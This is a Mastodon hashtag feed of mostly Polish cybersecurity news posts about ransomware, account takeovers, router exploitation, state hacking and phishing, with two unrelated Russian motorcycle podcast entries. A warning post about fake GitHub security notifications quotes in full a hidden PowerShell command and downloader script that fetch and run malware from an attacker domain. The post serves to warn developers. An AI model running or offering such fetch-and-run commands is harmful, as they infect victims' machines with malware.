#Ataki

2026-02-27

AirSnitch: “nowy atak na WiFi omijający szyfrowanie”.

Tego typu nagłówki mogą być trochę mylące (a pojawiają się już w zachodnich mediach). Zobaczmy wiec co właśnie ujawnili badaczo-hackerzy ;) Atak umożliwia podsłuch ruchu w sieci WiFi (atak Man in The Middle). Brzmi groźnie? No tak, ale: W badaniach ataki wykazywały się wysoką skutecznością – blisko 100% (tj. nie...

#WBiegu #Airsnitch #Ataki #Mitm #Podsłuch #Wifi

sekurak.pl/airsnitch-nowy-atak

2026-02-23

OpenAI wdraża Lockdown Mode. Czy to oznacza koniec ataków typu prompt injection?

Projektując aplikacje oparte o duże modele językowe (LLM) należy zapoznać się z OWASP TOP 10 for LLM. Jest to bezpośredni odpowiednik OWASP TOP 10 dla aplikacji webowych, zawierający listę najczęściej występujących podatności w aplikacjach korzystających z LLM. TLDR: Zgodnie z przewidywaniami, na pierwszym miejscu umieszczono Prompt Injection – zagrożenie, wynikające z...

#WBiegu #Ai #Ataki #Lockdown #Openai #PromptInjection

sekurak.pl/openai-wdraza-lockd

2025-10-20

[AKTUALIZACJA] Przejęli mu konto, ale pomoc techniczna Google nie chce mu pomóc

Co może się stać, kiedy ktoś przejmie Wasze konto Google? Dużo. Strasznych. Rzeczy. Czy można takie konto odzyskać? Niby można, ale przypadek Mateusza pokazuje, że …nie można. I to pomimo nawiązania kontaktu z pomocą techniczną Google i pomimo posiadania wielu dowodów na to, że przejęte konto do Mateusza należy.
Oto jedna z najbardziej kuriozalnych historii, jaką ostatnio widzieliśmy. Istny cyfrowy paragraf 22. Zobaczcie jak Mateusz wpadł w czarną dziurę i uświadomcie sobie, jak niewiele znaczycie dla firm takich jak Google, pomimo tego, że przez lata płacicie im za różne usługi. Artykuł doczytajcie do końca, tam informujemy co warto zrobić, aby nie ponieść takich strat, jakie poniósł Mateusz w wyniku pewnej luki w procesach Google.
Kolega podesłał mi linka, w którego kliknąłem…
Historia Mateusza zaczyna się 25 września, kiedy odzywa się do niego znajomy na Discordzie. Znajomy przesła mu linka do strony https://vampirk-beta.netlify[.]app a Mateusz pobiera z niej plik .exe (MD5: 1E7997DFEF983BE219D95A1842FEE298) myśląc że to gra o której rozmawiają. I “grę” tę uruchamia. A robi to dlatego, że pracuje w branży gier komputerowych i takie prośby od znajomych nie były dla niego niczym niecodziennym.

Problem w tym, że konto znajomego, który do Mateusza napisał zostało wcześniej przejęte przez atakującego, a pobrana gra okazała się trojanem…
Efekt? Atakujący przejmuje konta Mateusza, zarówno to na Discordzie jak również inne — w tym niestety konto Google. Ale najwyraźniej kradnie tylko ciasteczka i samo “wejście w sesję Mateusza” nie daje mu możliwości przejęcia pełnej kontroli nad kontem zapewne przez brak hasła, więc robi coś bardzo sprytnego:
Włamywacz prosi mnie [...]

#Ataki #Discord #GMail #Google #Malware #PomocTechniczna #Stealer #Support

niebezpiecznik.pl/post/przejet

Michal Boguszm10@101010.pl
2025-08-29

Ostrzeżenie przed globalną, chińską kampanią cyberszpiegowską

NSA wraz z agencjami ds. cyberbezpieczeństwa z 18 państw, w tym Agencją Wywiadu i SKW, wydała ostrzeżenie dotyczące kampanii cyber-szpiegowskiej prowadzonej przez chińskie podmioty, której celem jest krytyczna infrastruktura na całym świecie.

wp.me/p3fv0T-hEZ #Chiny #ChRL #USA #Polska #ostrzeżenie #cyberbezpieczeństwo #ataki #infrastruktura #telekomunikacja #POLECANE

MOTORADIOatsypin
2025-07-02

Квадроцикл «Kayo AU 300 EFI». Мотоэнциклопедия на MOTORADIO. ► Подкаст программы: podcasts.apple.com/ru/podcast/
⏤⏤⏤⏤⏤⏤⏤ 
Бренды, марки, модели, азбука мотоциклиста. В этом выпуске: квадрицикл «Kayo AU 300 EFI» (tinyurl.com/3pncrk7f ). Автор и ведущий рубрики - эксперт мотосалона Алексей Котлицкий. При участии специалистов мотоцентра «Роллинг Мото Санкт-Петербург» на Богатырском проспекте / www.rollingmoto.ru  #роллингмото ,

MOTORADIOatsypin
2025-06-25

Культовый питбайк «Kayo ТТ 125» в рубрике «Мотоэнциклопедия» на MOTORADIO. ► Подкаст программы: podcasts.apple.com/ru/podcast/
⏤⏤⏤⏤⏤⏤⏤ 
Бренды, марки, модели, азбука мотоциклиста. В этом выпуске: питбайк «Kayo ТТ 125». Записано при участии специалистов мотоцентра «Роллинг Мото Санкт-Петербург» на Богатырском проспекте. Вебсайт: www.rollingmoto.ru Автор и ведущая рубрики - эксперт мотосалона, Алина Бородина. ,

2025-05-30

Masz router Asusa? Sprawdź czy nie została wydana aktualizacja

Firma GreyNoise (wykorzystując AI) natrafiła na aktywną kampanię nieznanej grupy cyberprzestępców, która wykorzystuje kilka podatności do przejęcia kontroli nad routerami firmy Asus. Kampania śledzona jest pod nazwą ViciousTrap.  Wśród wykorzystywanych luk możemy znaleźć, załataną niedawno podatność CVE-2023-39780 czyli command injection, która pozwala na wykonywanie poleceń systemowych. Oprócz tego, w atakach,...

#WBiegu #Apt #Asus #Ataki #Cve #Iot #Router

sekurak.pl/masz-router-asusa-s

2025-04-13

Szwajcaria wprowadza nowe prawo dotyczące zgłaszania cyberataków

Szwajcaria postanowiła nie zostawać w tyle za innymi państwami, które już wprowadziły lub wprowadzają właśnie nowe regulacje dotyczące cyberbezpieczeństwa. 1 kwietnia na szwajcarskie firmy został nałożony nowy obowiązek informowania o cyberatakach w konkretnym czasie od wykrycia zdarzenia.  W Szwajcarii w 2023 roku przyjęto nowelizację Information Security Act (ISA), która weszła...

#WBiegu #Ataki #Awareness #Cyberawareness #Prawo #Przepisy #Szwajcaria

sekurak.pl/szwajcaria-wprowadz

2025-04-02

Cyberprzestępcy stawiają na kradzież tożsamości – alarmujące wnioski z najnowszego raportu Cisco Talos

Cisco Talos opublikowało raport „Year in Review”, który ujawnia, że w 2024 roku cyberprzestępcy coraz częściej atakują tożsamości użytkowników, zamiast łamać zaawansowane zabezpieczenia.

Aż 60% incydentów analizowanych przez zespół Cisco Talos Incident Response dotyczyło przejmowania kont przy użyciu skradzionych danych logowania, takich jak identyfikatory sesji, klucze API czy certyfikaty cyfrowe. W przypadku ataków ransomware odsetek ten wzrósł do 70%, co pokazuje, jak skuteczne stały się te metody.

Najbardziej narażonym sektorem w minionym roku było szkolnictwo wyższe, głównie z powodu ograniczonych budżetów na cyberbezpieczeństwo i dużej liczby użytkowników. Kolejne miejsca zajęły administracja publiczna, przemysł wytwórczy, opieka zdrowotna i finanse. Raport wskazuje, że grupy ransomware, takie jak LockBit – najaktywniejsza w 2024 roku mimo prób jej rozbicia – oraz nowa, ale agresywna RansomHub, skutecznie omijają systemy ochronne, często wykorzystując legalne konta do uzyskania dostępu. Dodatkowo, 44% ataków na tożsamość dotyczyło usługi Active Directory, a 20% aplikacji chmurowych, szczególnie API.

Cisco wprowadza nowe punkty dostępowe Wi-Fi 7 i przełączniki MS150 dla inteligentnych przestrzeni

Kluczowym problemem pozostaje wykorzystywanie starych luk w zabezpieczeniach, takich jak te w Apache Log4j czy Bash, które mimo wieloletniej obecności wciąż są szeroko eksploatowane.

„Obecny krajobraz zagrożeń pokazuje, że dla organizacji kluczowe jest dziś bardziej niż kiedykolwiek priorytetowe traktowanie podstawowych zasad cyberbezpieczeństwa oraz wdrażanie skutecznych mechanizmów ochrony tożsamości” – mówi Holger Unterbrink, lider techniczny w Cisco Talos. „Kolejnym istotnym problemem jest wykorzystywanie starszych podatności – niektóre z nich mają już dekady, a mimo to wciąż występują w powszechnie używanym oprogramowaniu i sprzęcie. Wiele z najczęściej atakowanych podatności dotyczy właśnie urządzeń, dla których nie są już dostępne aktualizacje zabezpieczeń”.

Raport wskazuje, że wiele ataków można by zapobiec, stosując regularne aktualizacje, silne uwierzytelnianie (MFA), segmentację sieci, szyfrowanie ruchu i bieżące monitorowanie zagrożeń.

Sztuczna inteligencja, choć często kojarzona z zaawansowanymi atakami, jest wykorzystywana przez cyberprzestępców w bardziej pragmatyczny sposób – głównie do ulepszania technik phishingu, inżynierii społecznej i automatyzacji. Cisco Talos zaleca pięć podstawowych zasad cyberbezpieczeństwa: regularne aktualizacje, stosowanie MFA, kontrolę dostępu, szyfrowanie danych oraz śledzenie branżowych rekomendacji. Raport powstał na podstawie analizy 886 miliardów zdarzeń dziennie z 46 milionów urządzeń w 193 krajach.

Cisco wprowadza nowe podejście do ochrony łańcucha dostaw AI

#ataki #Cisco #CiscoTalos #cyberbezpieczeństwo #news #ochronaTożsamości

Cisco Talos
2025-01-23

Nowy atak ransomware Interlock – celem duże firmy i ich dane

Ataki ransomware pozostają jednym z najpoważniejszych i najbardziej kosztownych zagrożeń, które nieustannie ewoluuje. Jednym z nowszych stadiów tej niepożądanej ewolucji jest nowy atak ransomware Interlock.

Nowe zagrożenie przyciągnęło uwagę zespołu badawczego Cisco Talos — jak twierdzą eksperci to stosunkowo nowy gracz na scenie cyberzagrożeń, który wyróżnia się wysokim poziomem zaawansowania technicznego oraz unikalnym podejściem do prowadzenia ataków.

Czym jest Interlock?

Jak większość ataków ransomware, także jego nowa forma skutecznie szyfruje dane ofiat. Jednak Interlock robi coś więcej. Oprócz szyfrowania realizuje strategię podwójnego wymuszenia (double extortion), polegającą na równoczesnym szyfrowaniu plików i grożeniu ujawnieniem wykradzionych danych. Ataki tego rodzaju koncentrują się przede wszystkim na dużych organizacjach, co wpisuje się w taktykę tzw. „big-game hunting” — ataków na największe cele, których złożona infrastruktura i krytyczne dane stają się łakomym kąskiem dla cyberprzestępców. Dzięki zastosowaniu zaawansowanych narzędzi, Interlock skutecznie infiltruje sieci ofiar i eskaluje swoje uprawnienia.

Pierwszą aktywność tego ransomware zaobserwowano we wrześniu 2024 roku, kiedy to przeprowadzono serię ataków na organizacje z sektora zdrowia, technologii, produkcji oraz instytucje rządowe w Stanach Zjednoczonych. Interlock atakował infrastrukturę organizacji, wykorzystując niezałatane luki w zabezpieczeniach. Według danych udostępnionych na blogu Interlock, ich działania są częściowo motywowane chęcią pociągnięcia firm do odpowiedzialności za słabe cyberbezpieczeństwo, a także zyskiem finansowym.

Jak działa?

Ataki trwają średnio około 17 dni od pierwszego naruszenia do wdrożenia ransomware Interlock. Początkowy dostęp do systemu uzyskiwany był poprzez fałszywy plik instalatora przeglądarki Google Chrome, który uruchamiał złośliwe oprogramowanie typu RAT (Remote Access Trojan). Po uruchomieniu, złośliwy plik instalował skrypt PowerShell, który zapewniał trwały dostęp do systemu, umożliwiając dalsze działania.

Zidentyfikowano również złodzieja poświadczeń, który został napisany w języku Golang. Jak podaje Cisco Talos działał on poprzez kopiowanie danych logowania przechowywanych w przeglądarkach ofiary i zapisywał je w pliku. Z kolei keylogger rejestrował naciśnięcia klawiszy. Dodatkowo, atakujący wykorzystywali technikę kerberoasting (atak na protokół uwierzytelniania Kerberos wykorzystywany w sieciach Windows), aby zdobyć poświadczenia o wyższych uprawnieniach.

W trakcie ataku, Interlock uruchamiał narzędzia takie jak Azure Storage Explorer i AzCopy, które pozwalają na przesyłanie danych do chmury Azure, kontrolowanej przez napastnika. Interlock wykorzystuje technologię ransomware do szyfrowania plików ofiar, nadając im rozszerzenie „.Interlock” oraz umieszczając plik z żądaniem okupu w każdym zaszyfrowanym folderze. Próba wymuszenia zawierała instrukcje, grożące ujawnieniem danych ofiary, jeśli nie zostanie dokonana zapłata w ciągu 96 godzin.

Interlock demonstruje wysoki poziom zaawansowania technicznego, stosując złożone metody ataku, od początkowego naruszenia, po skuteczne szyfrowanie plików i żądanie okupu. Przykład tej kampanii podkreśla rosnące zagrożenie, jakie stanowią wyspecjalizowane grupy ransomware, których celem są duże organizacje. Zainteresowanych dokładniejszymi szczegółami odsyłam do wpisu na blogu Cisco Talos.

#ataki #CiscoTalos #cyberbezpieczeństwo #Interlock #news #ransomware #zagrożenia

Interlockatak
2025-01-16

Jak wygląda cyberbezpieczeństwo w dużym banku? I jak takie banki reagują na ataki?

Większość z Was trzyma swoje oszczędności w bankach. I nigdy ich nie straciliście z powodu ataku na bank. To jednak nie oznacza, że takich ataków nie ma. Są, ale banki to jedne z najbardziej dojrzałych i uregulowanych pod kątem cyberbezpieczeństwa instytucji. Co banki dokładnie robią, aby nie zostać zhackowanymi? Jakie incydenty się im zdarzają i jak je obsługują?
Tego dowiecie się już w piątek, 17 stycznia, o godzinie 20:00 na LIVE, na którym porozmawiamy z Tomaszem Lapajem i Dariuszem Jurkiewiczem, ekspertami dbającymi o cyberbezpieczeństwo w banku HSBC. Oto link do spotkania:

Transmisja potrwa ok. godzinę + sesja pytań i odpowiedzi. Już teraz kliknijcie na powyższy link, a potem na dzwoneczek, aby otrzymać powiadomienie od YouTube o starcie lajwa. Spotkanie będziemy też streamować na Facebooku i LinkedIn, ale zapraszamy Was przede wszystkim na YouTube, bo tam aktywny będzie czat, dzięki czemu będziecie mogli naszym gościom zadawać swoje pytania.
Możecie też wpisać swój e-mail w formularzu poniżej, wtedy otrzymacie od nas przypomnienie o transmisji e-mailem, ~15 minut przed startem:

Wpisz adres e-mail:

Rozwiąż Captcha:

HP

Bez obaw, podanych e-maili nikomu nie przekazujemy i wykorzystamy je wyłącznie do przypominania Ci o naszych wydarzeniach. Jeśli lubisz czytać o RODO, kliknij tutaj.
O czym będzie?
Tomek i Dariusz opowiedzą m.in. o:

Tym jak wygląda praca w bankowym SOC-u?
Jak banki dowiadują się o incydentach i jak wygląda proces incident response?
Które z ataków obserwują najcześciej i które z nich są “najstraszniejsze”?
Co trzeba umieć, aby dostać robotę w którymś z bankowych zespołów cyberbezpieczeństwa, czy warto inwestować w branżowe certyfikaty?
Co banki robią, aby wyeliminować ryzyko związane ze “zbuntowanym [...]

#Ataki #Banki #HSBC #NIST #PSD2

niebezpiecznik.pl/post/cyberbe

2024-10-15

What The Fudan!? – czyli jak produkt kompatybilny z MIFARE Classic wprowadził backdoor

Piotr Rzeszut opisuje jak w prosty sposób można obezwładnić system kontroli dostępu bazujący na kartach MIFARE. Badacze znaleźli backdoor - zaszyty klucz w kartach pochodzących od jednego z producentów tańszych zamienników tych urządzeń.

#Teksty #Ataki #Mifare #Nfc #Podatność #Rfid

sekurak.pl/what-the-fudan-czyl

2024-10-04

2 popularne cyberataki w Polsce

Czy kiedyś dostałeś e-maila albo SMS-a, który już po pierwszych sekundach lektury wydawał Ci się podejrzany? Codziennie setki fałszywych wiadomości trafia na smartfony i skrzynki e-mail Polaków. Niestety nie każdy z nas jest w stanie od razu zorientować się, że wiadomość rzekomo od banku albo firmy kurierskiej to pierwszy krok phishingu, czyli sprytnego oszustwa, które kończy się wyłudzeniem danych osobowych lub kradzieżą pieniędzy z rachunku bankowego ofiary.
Pewnie kiedyś dostałeś jedną z tych wiadomości…
Twoje konto zostało zablokowane, aby je odblokować kliknij tutaj.

Twoja paczka nie może zostać dostarczona, bo w adresie brakuje nazwy ulicy, wypełnij ten formularz i uzupełnij dane adresowe, inaczej paczka zostanie odesłana do nadawcy.

To treści najczęściej używane przez internetowych złodziei. Ale pretekstów do ataku może być więcej. Kiedy zbliża się termin rozliczeń podatkowych, oszuści wysyłają wiadomości podszywające się pod Urząd Skarbowy. Kiedy rząd uruchamia nowy program pomocowy, wiadomości od oszustów będą nakłaniać Cię do wypełnienia wniosków o przyznanie dofinansowania. Na szczęście przed różnymi wariantami takich ataków możesz się łatwo obronić, o ile zastosujesz się do poniższych rad, które banki regularnie komunikują swoim klientom:

Zanim wpiszesz hasło albo uzupełnisz formularz swoimi danymi osobowymi takimi jak PESEL czy nazwisko panieńskie matki, popatrz na pasek adresowy. Czy faktycznie jesteś na stronie swojego banku?
Zanim potwierdzisz transakcję na swoim smartfonie, sprawdź czy jej kwota, rodzaj i odbiorca zgadzają się z danymi, które podałeś?
Zanim przepiszesz kod autoryzacji, wysłany przez bank SMS-em, przeczytaj dokładnie treść SMS-a i sprawdź, czy kod rzeczywiście dotyczy tej operacji, którą wykonujesz. [...]

#ARTYKUŁSPONSOROWANY #Ataki #Banki #Oszustwa #Pieniądze #Scam

niebezpiecznik.pl/post/najpopu

2024-09-24

Jak Mosad zdetonował elektronikę Hezbollahu?

Czwarty odcinek “Piotrek o Cyber”, czyli cotygodniowego przeglądu naj(ważniejszych|ciekawszych) wydarzeń z cyberbezpieczeństwa jest już gotowy do obejrzenia na niebezpiecznikowym kanale na YouTube.
Tematem przewodnim jest opis i analiza operacji izraelskich służb wymierzonej w Hezbollah. Ale parę słów poświęciłem też na analizę algorytmu YouTuba w kontekście filmów monetyzowanych i niemonetyzowanych (eksperyment trwa, a ten odcinek ma 10x zasięg) oraz atak na zdalne hakowanie rowerów z najnowszymi przerzutkami (tak, rowerów). Jest też silny dowód na to, jak faktycznie będzie wyglądało mordowanie ludzi przez AI (spoiler: nie będzie tak spektakularne jak Wam się wydaje). Oto link do nagrania, gdyby okienko z podglądem nie pojawiło się poniżej:

Artykuł konczę staroyotubowym: “zasubskrybujcie kanał“, żeby nie przegapić kolejnych odcinków! A poprzednie 3 przeglądy znajdziecie tutaj. Tak, to już miesiąc. Nie sądziłem, że tak długo wytrzymam.

#AI #Ataki #Żydzi #Hezbollah #Izrael #Krótkofalarstwo #Liban #Mosad #Pager #PiotrekOCyber #Rowery #Wybuch

niebezpiecznik.pl/post/jak-mos

2024-09-19

Uwaga programiści! Ktoś wysyła cwane komunikaty przez GitHuba

Jak informują nas programiści posiadający konto na GitHubie, od wczoraj otrzymują powiadomienia o następującej treści:
fot. przesłana prze z Jana
Hey there!
We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue.
Best regards,
Github Security Team
Powiadomienia są triggerowane przez dodanie (a następnie usunięcie) tzw. “issue” do projektu. Gdzie prowadzi link? Ano do strony, która próbuje na programiście wykonać atak “na CAPTCHA” opisywany przez nas ponad 2 tygodnie temu w ramach CyberAlertu. Ofiara widzi to:

Kliknięcie w przycisk na pierwszym ekranie kopiuje do schowka ofiary następującą komendę:
powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: XXXXXX"
A zastosowanie się do instrukcji widocznej na kolejnym ekranie uruchamia powyższą komendę, czyli w konsekwencji następujący kod infekujący komputer ofiary złośliwym oprogramowaniem:
$webClient = New-Object System.Net.WebClient
$url1 = "https://github-scanner[.]com/l6E.exe"
$filePath1 = "$env:TEMP\SysSetup.exe"
$webClient.DownloadFile($url1, $filePath1)
Start-Process -FilePath $env:TEMP\SysSetup.exe
Szczerze mówiąc, trochę nas dziwi dobór ofiar. Programiści akurat są świadomi, co robi skrót WIN+R. Z drugiej jednak strony, zainfekować programistę popularnego projektu na GitHubie to jak wygrać w totka…
Na jakie jeszcze ataki powinni uważać programiści?
Jeśli chcesz poznać wszystkie ataki, na które powinni być wyczuleni programiści aplikacji webowych, to wpadnij na nasze szkolenie z “Atakowanie i Ochrony Webaplikacji”. To dwa dni pełne praktyki [...]

#Ataki #Captcha #GitHub #Malware #Phishing #Programista #Programowanie #Socjotechnika

niebezpiecznik.pl/post/uwaga-p

2024-06-16

⚠️ Ważny komunikat dla użytkowników Windows!

Microsoft ostrzega: szybko wgraj łatkę, bo ktoś może Cię zhackować. Nie musisz w nic klikać, atakujący nie musi znać żadnego Twojego hasła — wystarczy, że znajdzie się w zasięgu Wi-Fi Twojego urządzenia. Co gorsza, atak pozwala na wykonanie dowolnego polecenia na urządzeniu ofiary, a dziura znajduje się we wszystkich wersjach systemu Windows, nawet w leciwym Windows Server 2008.
Nadchodzą ataki!
Badacze spodziewają się, że lada chwila pojawi się gotowe narzędzie, które będzie ułatwiało przeprowadzenie ataku z wykorzystaniem tej dziury!
A więc nie zwlekaj i jak najszybciej zaktualizuj swoje komputery i inne urządzenia, które pracują pod kontrolą systemu Windows.
Tego “radiowego” ataku, ze względu na jego specyfikę, nie powstrzymuje żaden firewall ani antywirus. Jedyną ochronę daje wgranie najnowszych aktualizacji z czerwcowego “patch Tuesday”, które usuwają tę dziurę.
Windows 11 powinien wgrać tę poprawkę automatycznie, ale możesz sprawdzić, czy to zrobił, klikając na Start –> Ustawienia –> Windows Update
Szczegóły techniczne błędu
Luka otrzymała punktację CVSS 8.8 na 10 i przydzielono jej identyfikator CVE-2024-30078
Ze względu na stopień zagrożenia i sposób ataku oraz fakt, że dotyczy on wszystkich systemów Windows postanowiliśmy wysłać ostrzeżenie przed tym atakiem do użytkowników naszej aplikacji CyberAlerty. Jeśli też chcesz być informowany o atakach, które zagrażają Twoim danym lub pieniądzom, zainstaluj CyberAlerty na Androida lub iPhona. To nic nie kosztuje i nie wymaga podawania żadnych danych.

#Ataki #Cyberalert #Microsoft #RCE #Windows

niebezpiecznik.pl/post/atak-wi

2023-12-14

Ukraińcy zhackowali system podatkowy w Rosji, a chwilę po tym sami zostali zhackowani przez Rosjan

We wtorek, kiedy prezydent Zełeński przygotowywał się do spotkania z prezydentem USA w Waszyngtonie, ktoś (czyt. Rosjanie) zhackował największego ukraińskiego operatora telefonii komórkowej – Kyivstar odcinając 24 miliony Ukraińców (czyli połowę ludności) od możliwości korzystania z połączeń telefonicznych. Wg Netblocks, nad ranem dostępność sieci Kyivstar spadła do 12%:

Ale brak możliwości dzwonienia może nie być największym problemem. Analitycy spekulują, że atak mógł sparaliżować także:

system ostrzegania przed bombardowaniami
systemy sterowania dronami, czy też szerzej, komunikację w wojsku (bo choć ukraińskie wojsko ma swoje systemy komunikacji, to część łączności bazuje na telefonii komórkowej)
no i wreszcie: innych ukraińskich operatorów, na których infrastrukturę zapewne spora część abonentów Kyivstar się przesiadła, kiedy “stracili zasięg”.

Do ataku przyznała się grupa Solntsepek, która wedle analityków, jest powiązana z grupą Sandworm (czyli rosyjskim GRU). Jeśli wierzyć ich komunikatowi na Telegramie, mieli “zniszczyli” operatorowi 10 000 komputerów i 4000 serwerów wraz z backupami.

Sam operator jednak informuje, że systemy z danymi klientów są bezpieczne i nie zostały objęte atakiem:

Chwilę po tym, jak poinformowano o ataku na Kyivstar, z internetu zniknął ukraiński Monobank. Ale tutaj, jak informuje bank, powodem była tak DDoS, a więc zupełnie inny kaliber problemu.
Czy ten atak to była odpowiedź na wcześniejszą cyberoperację Ukraińców?
Kilka godzin później we wtorek, Ministerstwo Obrony Ukrainy poinformowało, że Ukraińcy włamali się do rosyjskiego systemu podatkowego, niszcząc [...]

#Ataki #Cyberoperacje #GRU #Kyivstar #Monobank #Rosja #Ukraina #Wojna

niebezpiecznik.pl/post/ukrainc

2023-12-13

FBI razem z Polakami zepsuli Rosjanom cyberoperację

Rosjanie z grupy APT29 (czyli SVR, rosyjskiej Służby Wywiadu Zagranicznego) od końca września atakowali różne instytucje z wykorzystaniem podatności w JetBrains TeamCity (CVE-2023-42793). Operację Rosjan wykryli, przeanalizowali i unieszkodliwili wspólnie: Polacy z SKW i CERT Polska wraz z Amerykanami (z FBI i CISA oraz NSA) a także Brytyjczykami z NCSC oraz firmą Microsoft. Szczegółowy raport z pracy tego zacnego grona znajdziecie tutaj, a teraz skrótowe wyjaśnienie całej operacji:
Dlaczego ataki na JetBrains są groźne?
JetBrains TeamCity to rozwiązanie z kategorii kluczowych. Firmy wykorzystują je do zarządzania kodem źródłowym, z którego tworzą swoje aplikacje. Jeśli ktoś uzyska dostęp do kodu, może nie tylko poznać szczegóły na temat pracy danej aplikacji (w tym kradzież autorskich algorytmów lub certyfikatów kryptograficznych) ale — co groźniejsze — modyfikować ten kod i wprowadzić do niego backdoora. To pozwala na wykonanie klasycznego ataku na łańcuch dostaw. Włamywacze uzyskują dostęp do każdej firmy, w której wykorzystuje się aplikacje zbudowane z zaatakowanego przez nich wcześniej repozytorium kodu.
Przypomnijmy tu globalny atak robakiem WannaCry, który rozpoczął się od modyfikacji ukraińskiego oprogramowania Medoc. Albo atak na ASUS-a lub CCleanera, którego zainfekowaną wersję wykorzystano do ataku na inne podmioty.
Jak jednak informują w ten notce autorzy analizy:
Wspólne działania pozwoliły na identyfikację kampanii, ofiar i technik wykorzystywanych przez SVR w trakcie działań, na skuteczne zablokowanie infrastruktury wykorzystywanej do prowadzenia operacji oraz na unieszkodliwienie narzędzi wykorzystywanych przez SVR. Nie są to pierwsze ani ostatnie działania sojuszniczych służb, mające na celu ochronę [...]

#APT29 #Ataki #CERT #CISA #FBI #JetBrains #Microsoft #NCSC #NSA #SKW #SVR

niebezpiecznik.pl/post/fbi-raz

Client Info

Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst